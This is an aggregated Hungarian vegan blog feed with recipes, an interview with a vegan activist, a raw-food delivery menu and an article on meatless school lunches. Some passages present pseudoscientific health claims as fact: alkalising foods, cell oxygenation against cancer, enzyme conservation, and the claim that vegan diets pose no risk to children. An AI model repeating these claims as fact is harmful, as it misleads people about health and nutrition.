Úgy tűnik, hogy a blogom teljesen “megjavult” és többségben lévő édesség receptek után most egyre több saláta recept kerül megosztásra. Őszinte leszek, ezeknek a recepteknek a nagy része még régebben készült – mondhatjuk úgy is, hogy dolgoztam előre az ínséges időkre. Sütni tényleg nem sütök, nyáron pedig sajnos kimaradtak a jégkrémek is, ugyanis a mini hűtőnk mini mélyhűtő fakkját megszállták az anyatejjel teli zacskók és nem fért be semmi más… még jégkrémet sem tudtam fagyasztani. Szóval az egészséges, tápláló saláták egy része nem most kerül fogyasztásra… bárcsak így lenne. De egy egyre mozgékonyabb és egyre több figyelmet követelő baba mellett a “dobjunk össze valamit gyorsan” elv a legkézenfekvőbb. Azért nemcsak tésztát eszünk tésztával, hanem párolok zöldségeket, pirítok tofut fokhagymával és jó nagy adag salátákat is eszünk esténként. Igyekszem megtartani az egyensúlyt és ha úgy érzem túl sokat “vétkeztünk”, akkor néhány napig biztosan teljes tápértékű ebéd vagy vacsora kerül az asztalunkra.
Ez a saláta gyorsan összedobható, szóval biztosan el fogom készíteni újra. Ha laktatóbb fogásra vágyunk, akkor főzzünk mellé barnarizst vagy quinoát, kölest vagy hajdinát. Ha nem sikerül tempeh-t beszereznetek, akkor helyettesítsétek tofuval, azzal is nagyon finom.
Leveleskel tempeh saláta
Hozzávalók 2 főre:
Salátához:
- egy csokor leveleskel, levelek a szártól eltávolítva és kisebb darabokra tépkedve
- 2-3 szál újhagyma, felaprítva
- 1/2 csokor petrezselyem, felaprítva
- 1/4 bögre dió, száraz serpenyőben megpirítva és felaprítva
- 250 g tempeh, felkockázva
- 1 evőkanál szójaszósz
- 1 evőkanál balzsamecet
- 1 teáskanál méz
- só, bors
- olívaolaj
Öntethez:
- 2 evőkanál olívaolaj
- 2-3 evőkanál frissen facsart citromlé
- 1 teáskanál méz
- 1 gerezd fokhagyma, felaprítva
- 2 evőkanál tahini
- 1 evőkanál sörélesztő pehely
- só, bors
- chilipehely
- víz
Tegyünk egy serpenyőbe 2 evőkanál olívaolajat és pirítsuk meg a tempeh kockákat néhány perc alatt. Adjuk hozzá a szójaszószt, a balzsamecetet, a mézet és főzzük tovább 2-3 percig, majd zárjuk el alatta a lángot.
Az öntethez keverjük össze egy tálkában az olívaolajat, citromlevet, mézet, fokhagymát. Ízesítsük sóval, borssal, majd keverjük hozzá a tahinit, a sörélesztő pelyhet, a chilipelyhet és hígítsuk egy kevés vízzel.
Tegyük egy tálba a leveleskelt, a petrezselymet, az újhagymát, a diót. Adjuk hozzá a pirított tempeh-t. Locsoljuk meg az öntettel, keverjük össze és tálaljuk.
Répás csicseriborsóragu indiai módra
Berke-Kovács Juditnál láttam ezt a finomságot, ami annyira guszta volt, hogy elkészítettem én is.
Millió puszi a recept ötletért.
Többször is készíteni fogom, meg igazi ízlelőbimbócsiklandozó finomság. Rizzsel tálaltam.
Hozzávalók, ahogy én készítettem: 1 doboz konzerv csicseriborsó (vagy 20 dkg száraz, előre egy egész éjszakára beáztatott), 1 db nagy sárgarépa, 2 vöröshagyma, szőlőmag- vagy olívaolaj, himalaya só, fűszerek: curry por, gyömbér por, kurkuma (az eredeti recept szerint curryből 4 teáskanál, gyömbér porból 1 kávéskanál, kurkumából 1 teáskanál, de én mindegyikből picit kevesebbet tettem bele), pici garam masala por (indiai fűszer), kb. 1 dl (vagy picit valamivel több sűrített paradicsom, vagy házi paradicsomlé), 2 babérlevél.
Elkészítés: A vöröshagymát olajon megfuttattam, majd rádobtam a csicseriborsót és a répát, megfűszereztem, majd felöntöttem vízzel, és hozzáadtam a paradicsomlét. Addig főztem, míg megpuhult.
Jó étvágyat!
Szinte minden íz megvan benne: sós, édes, savanykás… mennyei.
Zöld tej
2013. október 26. Fittanyuka Blog
Többször írtam már arról, hogy a zöldek, a klorofill milyen fontos egészségünk szempontjából. Nemcsak lúgosítják szervezetünket, hanem nagyon sok élő enzimet, vitamint, ásványi anyagot tartalmaznak, továbbá ami a legfontosabb, hogy oxigénnel töltik fel sejtjeinket. Ez azért lényeges, mert a rákos sejtek oxigén szegény környezetben szaporodnak. Az alábbi recept egy krémesebb változat, tejszerű. Azoknak is ideális akik kicsit idegenkednek a turmixolt változattól. Továbbá a gyerekek is szívesebben megisszák. Nekik édesebb változatban is készíthetjük. Pl: 1-2 db almával, vagy 1 db banánnal. Növényi tej: a legfinomabb hozzá a mandulatej, vagy kókuszkrém. Ezeket házilag is elkészíthetjük ha van időnk, ugyanis így még élőbb az italunk. Ha nincs akkor készen kapható mandulatejjel, vagy kókuszkrémmel is működik. Hozzávalók: 4 főre 2 db kígyóuborka 2 db szál zeller 2-3 marék friss spenót levél 4 pohár mandulatej ( kb. 200 ml / pohár) vagy 400 ml kókuszkrém, kókusztejszín 200 ml víz vagy a növényi tej elkészítése házilag: recept késhegynyi őrölt gyömbér, vagy őrölt szerecsendió, vagy fahéj vagy Botanical infusion - revitalise (by Oriflame) A zöldeket most nem turmixoljuk hanem présgép segítségével lepréseljük. Ha nincsen gyümölcs centrifugánk, akkor kevés vízzel összeturmixolhatjuk, majd nylon harisnya segítségével átszűrjük. Utána már csak annyi a dolgunk, hogy összekeverjük, akár turmixolhatjuk a mandulatejjel vagy kókusztejszínnel. Mint már említettem gyerekeknek készíthetjük édesebben, ebben az esetben alma levet is préselünk a zöld levekhez, vagy utólag amikor összeturmixoljuk hozzáadunk egy banánt. Üvegbe töltve 1-2 napig hűtőben eláll, tovább már ne tároljuk. Minél frisebben fogyasztjuk annál értékesebb anyagok jutnak a szervezetünkbe! Zöld tej alaprecept forrás: Dr. Robert O. Young - pH Csoda Fittanyuka
Vegán aktivisták: Bonifert Anna - Vegán Állatvédelem
2013. október 24. La Veganista
A blogban az eddig közzétett receptek és életmóddal kapcsolatos cikkek mellett szeretnék bemutatni egy-egy aktivistát, aki tevékenységével hozzájárul a veganizmus szélesebb körben való terjesztéséhez, népszerűsítéséhez. Első beszélgető partnerem a Vegán Állatvédelem frontembere. Bonifert Annát, talán sokan személyesen ismeritek, vagy találkoztatok már a nevével, cikkeivel előadásaival. Kedves, mosolygós fiatal lány, de ez ne tévesszen meg senkit, hiszen igazi harcos aktivista, aki nem fél síkraszállni az állatok jogaiért. Ha kell TV stúdióban, máskor egy autó tetején, megafonnal a kezében mondja el, hogy a modern kor emberének alapvető erkölcsi normájába nem fér bele az állatok árucikké tétele.
La V.: Kérlek, segíts megvilágítani egy fontos kérdést azok számára, akik a téma iránt érdeklődnek: mi az a veganizmus? Milyen főbb irányzatai vannak?
B.A. Különböző emberek különbözően értelmezik ezt a szót. Azok számára, akik a saját egészségük javítását tűzték ki célul, vegánnak lenni csupán annyit jelent, hogy nem fogyasztanak tejterméket és tojást sem. Ez nagyon jó, de vegánnak lenni ennél jóval többet jelent. Az ,,igazi vegánok olyan emberek, aki elutasítják az állatok használatát etikai alapon. Vagyis semmi olyan terméket vagy szolgáltatást nem vesznek igénybe, amihez állatokat tartanak fogva, szaporítanak, ölnek.
La V.: Mióta vagy vegán és miért kötelezted el magad mellette?
B.A.: Két és fél éve. Egyszerűen azért, mert nem akarom bántani az állatokat. Ehelyett amennyire csak tehetem, tenni akarok a fennálló rendszer ellen, ami őket tárgyként, eszközként kezeli. A fogyasztói bojkott, mint Gandhi óta tudjuk, a leghatékonyabb és legszelídebb módja a forradalomnak.
La V.: Van példaképed a hazai vagy nemzetközi vegán szcénában, aki inspirálóan hat a működésedre?
B.A.: Példaképem nincs, de az elején, amikor vegánná váltam Gary L. Francione írásai hatottak rám.
La V.: Könnyű ma Magyarországon vegánként élni? Értem ezalatt a kulturális közeget, az állatokhoz való viszonyulást, vagy az elérhető termékeket.
B.A.: Termékek szempontjából egyértelműen igen, fel se tűnik a hétköznapokban. Nem érzem, hogy bármi is hiányozna. Ma már sokkal több vegán termék van a boltokban, mint két éve és elég esélyes, hogy ez a tendencia érvényesül továbbra is. Az emberek többségének hozzáállásával együtt élni néha nehéz, de a helyzet itt is egyre javul.
La V.: Vannak, akik szimpatizálnak a vegán életmóddal, de félnek belevágni, mert úgy érzik, hogy a környezetük csodabogárnak tartaná őket. Te tapasztaltál ilyesmit? Ha igen, hogyan kezelhető ez a probléma?
B.A.: Sajnos igen. Ez az egyetlen nehézség, bár ez is csak azoknak, akiket érdekel, mások mit gondolnak róluk. Szerintem meg kell próbálni türelmesnek lenni a többi emberrel. Sosem könnyű forradalmárnak lenni, de a vegán életmód az erőszakmentesség forradalma, így teljesen nyilvánvaló, hogy a kommunikációs módszereinknek is erőszakmentesnek kell lennie. Szóval türelmesnek kell lenni és nem bántani, nem sértegetni a nem vegánokat még akkor sem, ha ők néha sértegetnek minket. Nem értik, miért vagyunk vegánok, de idővel meg fogják érteni.
La V.: Milyen lehetőségei vannak az érdeklődőknek a közösségi élet területén? Milyen csoportokhoz fordulhat segítségért, támogatásért, milyen programokhoz csatlakozhat?
B.A.: Ha olyan emberről van szó, aki használ facebook-ot, akkor nagyon könnyű dolga van, csak beüti a keresőbe a vegán szót és talál egy csomó csoportot és oldalt, ahol hasonló ,,felébredt emberekkel vitathatja meg a dolgokat. Ha pedig valódi találkozásra fáj a foga, akkor jöjjön el valamelyik filmklubra vagy nyáron a piknikre, ahol 30-40 vegán vagy majdnem vegán érdeklődő gyűlik össze, hogy egyen és beszélgessen.
La V.: Több film készült, amely dokumentálja a vágóhidakon, a tejiparban, vagy a nagyipari állattartásban mindennaposnak számító brutalitást, és az állatok mérhetetlen szenvedését. Ezeket sokan lelki okok miatt nem nézik meg. Tudsz olyan a neten is elérhető filmet, előadást ajánlani, ami kíméletes, mégis hatásos formában informálja az embereket?
B.A.: Igen, sőt, a véres, állatkínzós filmeket én sem tudtam soha végig nézni, és nem is hiszem, hogy mindenkinek szüksége lenne rájuk ahhoz, hogy vegán legyen. Szerintem nagyon sokan csak belekezdenek, aztán kikapcsolják és aztán fogyasztóként továbbra is részt vesznek a rémségekben. Amit első filmnek ajánlok, az a Making the connection , ennek magyarul az "Összefüggések" nevet adtuk. Ez egy 30 perces összefoglaló, bevezető, kedvcsináló. Nagyon minimális benne az ijesztő képsor, az is csak a vége felé. Utána van két előadás, ami nagyjából ugyanazt mondja el, csak más stílusban: egy karizmatikusabb, vadabb és egy barátságosabb, kedvesebb pasi. Érdemes mind a kettőbe belehallgatni és utána eldönteni, melyik a szimpi. Mind a kettő nagyon jó!
A legjobb beszéd, amit valaha hallottál - Gary Yourofsky
Az igazi Mátrix - 101 ok, hogy a piros tablettát vedd be
La V.: Térjünk most át egy kényesebb kérdésre. Sokakban felmerül a kétely a vegán étrend egészségességével kapcsolatban. Hallottam már arról is, hogy némely orvosok gyerekek számára egyenesen károsnak tartják és megtiltják a vegán vagy a vegetáriánus étrendet. Van ennek alapja?
B.A: Semmi. Nagyon szomorú, hogy az orvosok többsége ilyen téves információkat tanult és terjeszt. Ezzel nem csak a vegán mozgalomnak árt, de a betegeinek is. A vegán étrend pont, hogy sokkal egészségesebb, mint egy vegyes vagy egy vegetáriánus. Éppen ezért sokan pont emiatt választják, nem is etikai alapon, ahogy már fentebb beszéltünk róla. Akit ez érdekel, annak ajánlom a Kína tanulmány című nemrég megjelent könyvet, melyben egy vegán orvos összegzi 30 év kutatásait táplálkozás témában. Magyar nyelven ez a legjobb, ami elérhető. Angolul jóval több van.
La V.: Ha már az egészségnél tartunk, személy szerint te tapasztaltál egészséggel kapcsolatos előnyt, vagy hátrányt az átállás után?
B.A.: Azt, hogy azóta nem vagyok beteg és hogy nem fáj a gyomrom. Ugyanezt hallom másoktól is. Több az energiánk, nagyobb az állóképességünk és le is adunk plusz kilókat, ha voltak.
La V.: Szeretnék feltenni egy személyes kérdést, ha nem bánod. Néha konfliktusokat okozhat egy párkapcsolatban, ha eltérő étrendet követnek, hiszen az eltérő értékrendet is jelenthet. A te párod elfogadja, hogy a vegán életmódot mellett döntöttél? Mit tanácsolnál azoknak, akiknek ez konfliktust okoz a mindennapokban?
B.A.: A régi párommal volt ebből konfliktus, mert ő vegyes étrenden élt. Eleinte piszkált a dologgal, hülyeségnek tartotta. Nem akartam vitázni, ezért arra kértem, nézze végig az Earthlings (Földlakók) című filmet, utána beszéljünk róla. Ez a leghosszabb és legrealistább film az állatok használatáról. Végig nézte és úgy állt föl, hogy többé nem eszik húst. Pár hónappal később pedig vegán lett és bár már jó ideje külön vagyunk, továbbra is az. A jelenlegi barátomat pedig a vegán pikniken ismertem meg, így ez a kérdés már fel sem merült. De a lényeg itt is, mint mindenütt, hogy kitartsunk a saját elveink mellett és türelmesek legyünk másokkal.
La V.: A vegán filozófia sarkalatos pontja az állati termékek használatának mellőzése, szervesen illeszkedik hozzá a vegán állatvédelem fogalma. Ezzel kapcsolatban létrehoztál internetes oldalt , facebook közösséget , melynek több mint ezer követője van, könyvet írtál , előadásokat tartasz , publikációid jelennek meg . Mi motivált erre? Mi a különbség a hagyományos és a vegán állatvédelem között?
B.A.: Amit a többség állatvédelemnek hív, az kutya-, és macskavédelem. Ez nagyon fontos dolog, én is hosszú éveket töltöttem kutyamentéssel és jelenleg is lakik nálam ideiglenes gazdikereső cica. Azért váltottam mégis az állathasználat ellen való küzdelemre, mert itt jóval nagyobb szükség van elkötelezett emberekre. Sokkal inkább gyerekcipőben jár a dolog és nehezebb is. Nem látja még az emberek többsége, hogy kutya és disznó, vagy macska és tehén között nincs olyan különbség, ami indokolná azt, hogy az egyiket szó nélkül leöljük, a másikat nem. Az a dolgunk, hogy ezt megmutassuk az embereknek és persze azt is, hogy vegánként élni könnyű és egészséges. Ez olyan dolog, amit a legtöbb kutyamentőnek és macskamentőnek is még meg kell értenie.
La V.: Milyen terveid vannak a közeljövőt illetően? Előadások, általad szervezett események, esetleg egy új könyv megjelentetése?
B.A.: Igen, dolgozom most egy új könyvön, ami az elsővel ellentétben nem kifejezetten az állatbarátokhoz fog szólni. A vegán életmód 4 fő motivációját szeretném áttekinthetően vázolni: környezetpusztítás, éhezés a harmadik világban, állatvédelem és egészségmegőrzés. Remélem, hogy ez tágabb közönséghez jut el és olyanokat is meggyőz, akiket az Állatvédők Könyve nem érintett meg.
La V.: Lesz Magyar Vegán Társaság? Te is alapítók között vagy, ezért kérlek, informáld a blog olvasóit arról, hogy hol tart a folyamat, mik a szervezet céljai?
B.A.: Hivatalosan még nem alakultunk meg, de már van honlapunk és vannak futó projektek. Fő célunknak tartjuk az ismeretterjesztést, és hogy segítsük azokat, akik nyitottak, akik szeretnének vegánok lenni. Erről szól például a VegaNinja program, amiről az oldalunkon olvashattok!
La V.: Közeleg a vegán világnap, amit november első napján ünneplünk. Lesz-e ehhez kapcsolódóan esemény, amire érdemes ellátogatni vegánnak és nem vegánnak egyaránt?
B.A.: Csinálunk egy infó standot az Oktogonnál 14:00 órától sötétedésig, ahol finom sütikkel és egyéb kóstolókkal várjuk az érdeklődőket. Lesz nálunk vegán szóróanyag, cirkuszi állathasználat ellenes aláírás gyűjtőív, állatvédő totó, vegán kitűzők, matricák... de amit a legjobban szeretnénk: beszélgetni az emberekkel, segíteni az érdeklődőknek. Biztos lesz járókelő, aki majd megáll és talán aznap hall először arról, hogy lehet állatok használata nélkül élni.
La V.: A La Veganista blog azt tervezi, hogy időnként megszólaltat egy-egy embert, aki tevékenységével, személyes példájával elősegíti a vegán életmód és eszmerendszer szélesebb körben való megismertetését. Te kit ajánlanál?
B.A.: Elsőként Stőhr Gréta profi vegán chef jut eszembe, idén jelent meg a könyve, ami jóval több mint egy vegán szakácskönyv, inkább életmód tanácsadónak mondanám. Gréta nagyon-nagyon sokat tesz a vegán életmód népszerűsítésért és sokat segít az embereknek.
La V.: Köszönöm a beszélgetést! Új könyved megírásához sok siker kívánok! Remélem, nagyon sok emberhez eljut majd a benne megfogalmazott üzenet.
Karamellizált hagymás burgonyapüré vegán barna mártással
2013. október 23. Zizi kalandjai
Ez egy köretnek számító étel, de annyira finom és laktató, hogy fő fogásnak is elmegy. A burgonyapüré édeskés karamellizált hagymával van feldobva és hozzá az isteni finom vegán barna mártás. Egyszerűen mennyei fogás! Úgy is mondhatom, hogy megnyaljuk utána mind a tíz ujjunkat!
Ugye a barna mártás eredetileg lepirított csontokból, sült hús levéből, alapléből, zöldségekkel készül, elkészítése igen időigényes, kis adagokban lefagyasztva sokáig eláll (forrás: mindmegette). Azonban nagyon hasonló ízvilágot érhetünk el, ha minden állati eredetű hozzávalót kihagyunk belőle és kreálunk egy vegán változatot. A mártás finom ízét a sós szójaszósz, a fokhagyma és a sörélesztő pehely adja. A burgonyapürén kívül pirított, sült zöldségeket, sült tofut, bármit meglocsolhatunk ezzel a mártással.
Több alkalommal használtam már sörélesztő pelyhet ételek ízesítéséhez, mint például ehhez a sütőtökös sajtos pennéhez. Igen, a sörélesztő pehellyel sajtos ízvilágot is el lehet érni, azonban a barna mártásban ez nem érződik. A sörélesztő egy egészséges táplálék kiegészítő. Magas B12 vitamintartalma miatt főleg vegetáriánusok és vegánok fogyasztják. Elősegíti a haj, köröm és bőr regenerálását, táplálását, szabályozza a vércukorszintet, csökkenti a koleszterint, fokozza a vitalitást. Használata rendkívül egyszerű, hiszen elég az ételre szórni és máris fogyasztható (még több infó itt).
Próbáljátok ki!
Karamellizált hagymás burgonyapüré vegán barna mártással
Hozzávalók:
Püréhez:
- 8 db közepes burgonya (kb. 600 g), meghámozva, felkockázva
- 2 db nagy fej vöröshagyma, felaprítva
- só
- szerecsendió
- ízlés szerint a püréhez: vaj / tejföl / tej / mandulatej, rizstej, zabtej
- olívaolaj
Mártáshoz:
- 2 gerezd fokhagyma, felaprítva
- 2 evőkanál szójaszósz
- 3 teáskanál sörélesztő pehely
- 3 evőkanál tönköly fehérliszt
- 250 ml víz
- só, bors
- olívaolaj
Egy lábasban hevítsünk fel 3-4 evőkanál olívaolajat közepes láng felett. Adjuk hozzá a felkockázott vöröshagymát, szórjuk meg egy csipet sóval (ez segíti elővarázsolni a hagyma édeskés ízét). Tegyünk a lábasra egy fedőt, vegyük takarékra a lángot és kezdjük el karamellizálni (főzni) a hagymát, alkalmanként keverjük át, hogy ne ragadjon le! Főzzük 25-30 percen keresztül, amíg teljesen puha, világosbarna lesz a hagyma.
Közben a burgonyát tegyük fel sós vízben főni. Kb. 20 perc alatt megpuhul, ekkor szűrjük le. Öntsük a burgonyát vissza a lábasba, adjunk hozzá tetszőlegesen vajat/tejfölt/tejet/mandulatejet – ízlésünk szerint -, majd burgonyatörővel törjük pépesre. Ízesítsük sóval és szerecsendióval, keverjük hozzá a karamellizált hagymát.
Egy kis lábasban 2 evőkanál olívaolajon dinszteljük meg a fokhagymát, majd adjuk hozzá a szójaszószt és a sörélesztő pelyhet. Adjuk hozzá a lisztet, keverjük el, majd lassan kezdjük el adagolni hozzá a vizet (ugyanolyan, mintha rántást készítenénk) és keverjük folyamatosan, amíg egy sima szószt, mártást kapunk. Ezután forraljuk fel néhány perc alatt és várjunk, amíg egy kicsit besűrűsödik. Ha nagyon sűrűnek találjuk, adjunk még hozzá egy kevés vizet. Tálaljuk a hagymás burgonyapürével.
Változás a házhozszállításban!
2013. október 21. Nyersétel akadémia
2013. október 28-tól (44. hét) a Nyersétel Akadémia konyhájában készült ételeket kizárólag az EGÉSZSÉGKONYHA szállítja házhoz! Ezzel egy időben a Vegafood-dal való együttműködésünk megszűnik! Felhívjuk figyelmeteket, hogy amennyiben a 44. héttől kezdve a Vegafood étlapjában nyers ételeket láttok, akkor azok már nem a Nyersétel Akadémia konyhájából valók! A 44. héttől a Nyersétel Akadémia ételeit kizárólag itt lehet megrendelni: www.egeszsegkonyha.hu
Sokan azt gondolják, hogy a zöldségeket csak saláta formájában lehet elkészíteni. Nagy tévedés! Íme itt a bizonyíték.
Csodás levesek, főzelékek, spagetti, pizza, rakott és töltött zöldségek a kínálatban! www.egeszsegkonyha.hu
A természet alapanyagaiból, a természet ízeit kínáljuk változatosan, finom formában.
A Nyersétel Akadémián mi elkészítjük az ételeket, az EGÉSZSÉGKONYHA pedig házhoz szállítja neked!
Korszerű, légmentesen záródó, fóliás dobozba csomagoljuk a “Z” kódokon található nyers, enzim dús, élő ételeinket.
Kóstold meg a főzés nélkül készült nyers leveseket, a főételek között a cukkini spagettit, a nyers főzelékeket, a zöldségtortákat, és az édességek közül pedig a gyümölcsökből készült pudingokat!
Egyre több táplálkozási irányzat jelenik meg az étlapokon, különböző fogyókúrák, diéták válnak ismertté világszerte. Egyről azonban nem szabad megfeledkeznünk: az egészségünk megőrzése érdekében a sokféle főtt, párolt és grillezett ételek mellett megfelelő mennyiségű nyers zöldséget és gyümölcsöt is fogyasztanunk kell! Nem csak az egészség, hanem a karcsúság, az ideális testsúly titka is a vitamindús, enzimekben gazdag, nyers ételek, saláták, turmixok fogyasztása.
Tovább őrizhetjük meg egészségünket és fiatalságunkat, ha takarékosan bánunk saját enzimkészletünkkel, és minél több külső enzimet juttatunk be a szervezetünkbe a nyers ételek segítségével. A nyers zöldségek természetes orvosságok, hiszen lúgosítanak, magas az ásványi anyag- és nyomelem tartalmuk, energiával töltenek fel úgy, hogy nem telítenek, nem hizlalnak.
A friss, nyers étel olyan energiabomba a szervezetünknek, amely biztosítja az egész napi aktivitásunkat.
Z1 Italok:
Zöld turmix: Bio zöld levél és édes gyümölcs pí-vízzel turmixolva. Feltölt energiával és oxigénnel, lúgosít, könnyen emészthető.
Magtejek: Diófélékből készített friss magtej, pl. vaníliás diótej, fahéjas mandulatej. Tartósítás nélkül készülnek frissen, hazai magokból.
Z2: Levesek: Gyümölcsökből vagy zöldségekből készülnek, enyhe fűszerezéssel, kevés olaj vagy olajos mag, dióféle felhasználásával.
Z3: Főételek1: Zöldségekből és diófélékből készült ételek, melyeket főételként lehet fogyasztani. pl. Cukkini spagetti: Cukkiniből kézi hámozóval, spirelli vágókéssel készített vékony csíkok különböző mártásokkal, szószokkal. Fasírtok: zöldségekből és olajos magokból készült aszalványok, melyeket salátával, zöldségekkel kínálunk. És még sok más étel, amit érdemes kipróbálni.
Z4: Főételek2: Zöldségekből és olajos magokból készített főételek, főleg rakott, töltött formában. pl. Rakott zöldségek: Különleges zöldség rakottas, melyben a dióféléből és zöldségekből készült rétegek váltják egymást, a teljes íz-harmónia megtartásával. Itt lehet megtalálni a kedvenc ételünket a nyers pizzát, melyet sokféle változatban készítünk.
Z5: Kenyér és pástétom: Különféle nyers kenyerek, aszalt lapok, valamint zöldséges pástétomok rendelhetők ezen a kódon. Elsősorban vacsorára ajánljuk, kiegészítve friss idényzöldségekkel, retekkel, hagymával, uborkával, stb.
Z6: Édességek: gyümölcsökből és olajos magokból készült finomságok, amelyekkel lelkiismeret furdalás nélkül kényeztetheted magad. Liszt, tojás és tejtermék nélkül készülnek, egészségesek és finomak.
Z7: Aszalványok: Teljesen kiszárított kenyerek, krékerek, műzlik, műzli-szeletek, melyek 4 hétig eltarthatóak. Teljesen ki vannak szárítva, így az étvágyunkat gyorsan csillapítják egy pohár tiszta vízzel együtt!
A nyersételeket az ÉTLAPUNK menüpont alatt, a világoskék színnel jelölt sorokban találod.
Feketebodza lekvár nektarinnal
Még augusztusban készítettem bio feketebodzából és nektarinból lekvárt. Tavaly is befőztem már egy kevésnyi feketebodzát, idén más gyümölcsöt tettem hozzá. Szenzációs, hogy finom, édes ízt tudtam elérni jó érett nektarinokkal. Sajnos csak most tudom publikálni. De jövőre más is kedvet kaphat, hogy elkészítse ezt a verziót.
A recept:
Hozzávalók:
1 nagy tálnyi feketebodza
4-5 szem jó érett, édes nektarin
üvegek
befőzési fólia
El(ő)készítés:
A bodzaszemeket villa segítségével lefésüljük.
Mint minden befőzés, úgy ez is két nélkülözhetetlen alappal indul.
1. A gyümölcsök alapos átmosása (többszöri vízben, a fekete bodzaszemek és a mosolygó nektarinok háromszor is megfürödtek jó hideg vízben), és természetesen az esetleges rossz szemek kiválogatása. Fekete bodza esetében rossz szemeknek minősülnek a zöld, vagy nem egészen fekete szemek, illetve az apró szárak, amik a vízzel való mosás során az a víz tetejére jönnek fel. Ezek ugyanis alhasi fájdalmakat, hasmenést okozhatnak.
2. Az üvegecskék előkészítése. A következő hadművelettel érdemes ezt végezni:
Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda-, karcmentesek. Mossuk el őket, ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig vagy egyharmadáig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már forr a víz mindegyik üvegben, kivehetjük a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lekvárunk. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat.
A lekvár elkészítése:
Miután alaposan átmostuk a gyümölcsszemeket, odatesszük főzni. Közben felvágjuk a nektarinokat, és amikor a bodza már kezd összeesni, nem szemes, akkor hozzáadjuk a nektarindarabokat. Ez segít a kocsonyás állag elérésében, valamint, ha édes barackkal dolgozunk, talán még édesíteni sem szükséges a lekvárt (nekem nem kellett).
Egy tömörebb anyagú lekvárt kaptam, pedig csak a nektarin került még bele a bodzán kívül.
A felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet (konyharuhával megfogva) és a helyére az elkészült lekvárt öntjük. A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk majd előkészített meleg helyre fejjel lefelé állítjuk. Ezt a műveletsort egyesével végezzük el, mindegyik üvegnél megismételve.
A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy kosárban. De máskor már rekeszbe vagy lavorba is tettem lekvárt. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog például.
Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 48 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni.
Lekvárfőzésnél megeshet, hogy nem tudjuk az egészet üvegbe tölteni. Tiszta edénybe rakva (akár üveg) a hűtőben egy darabig megőrzi minőségét. Bár szerintem előbb elfogy, mint megromlana.
Húsmentes bizonyítvány: Javuló eredmények és több energia
2013. október 19. La Veganista
Az Egyesült Államokban, ahol az elhízás olyan mértékben terjed a népesség körében, hogy már nem egyszerűen elhízásnak, hanem "Obesity epidemic"-nek, vagyis járványos elhízásnak nevezi a szakirodalom, egyre több iskola száműzi a menzáról a húst. Miközben az USA-ban szép lassan kezdik felismerni a kalória forrása és a túlsúly közötti szoros kapcsolatot, addig nálunk a vegetáriánus és vegán szülők összeszorított foggal küzdenek azért, hogy a gyermeküknek ne kelljen a hazai bölcsődei, óvodai, iskolai menzák húsos ételeit megennie. Küzdenek, a hazai orvoslás szemellenzős képviselőivel is, akik a gyermekek számára káros étrendként tekintenek a húsmentes életmódra. De vajon igazolják-e az egészséges étkezésről kialakított elképzelésüket az amerikai tapasztalatok?
forrás: cok.net
A New York City Queens negyedében található 244-es állami általános iskola bejelentette, hogy a menzája immár 100 százalékban húsmentes lett, s a bizonyítványát is megmutatta, hogy 400 tanulója miképp reagál a teljesen vegetáriánus étrendre, s hogy ez milyen előnyökkel jár.
A New York Daily Newsban megszólaltatott iskolavezetőség szerint a húsmentes étrend januári bevezetése óta a tanulók részvétele, eredményei, sőt, az energia szintje és koncentrációs képessége jelentősen növekedett. A cikk azt is megemlíti, hogy míg a gyerekek behozhatják saját, nem-vegetáriánus ebédjüket, kilencven százalékuk választotta a vegetáriánus menzát, ahol organikus rostonsült tofu és párolt fekete bab is szerepel a menüben.
De ennél is hasznosabb az egészséges táplálkozásról megtanult, egész életre szóló lecke, ami nem merül feledésbe az utolsó csengőszóval. A gyerekek heti táplálkozás-órán is részt vesznek, s a tanultakat megosztják a családjukkal.
Ezek a pozitív eredmények is azt a 2012-es tanulmányt támasztják alá, amely azt taglalja, hogy azokban az iskolakörzetekben, amelyek nagymérvű változásokat vezettek be az iskolai étkeztetés terén (mint pl. New York Cityben és Los Angelesben), csökkent a gyermekek elhízásának mértéke. Az iskolakörzetek szerencsére országszerte meghallották az üzenetet. A Baltimore Városi Iskolarendszer 2009-ben bevezette a Húsmentes Hétfőket - amelynek során minden hétfőn, 80.000 tanulót látnak el teljesen vegetáriánus ebéddel. Idén pedig a Los Angeles-i Egyesített Iskolakerület, az USA 2. Legnagyobb állami iskolarendszere minden egyes menzáján bevezette a 100 százalékosan Húsmentes Hétfőket, miután a városi tanács úgy döntött, hogy támogatja a kampányt. Legutóbb pedig a San Diego-i Egyesített Iskolakerület kezdte el a Húsmentes Hétfők bevezetését a menzáin, az óvodától a nyolcadik osztályig.
Padlizsán vagy pulykacomb? - A paleolit mítosz
2013. október 16. La Veganista
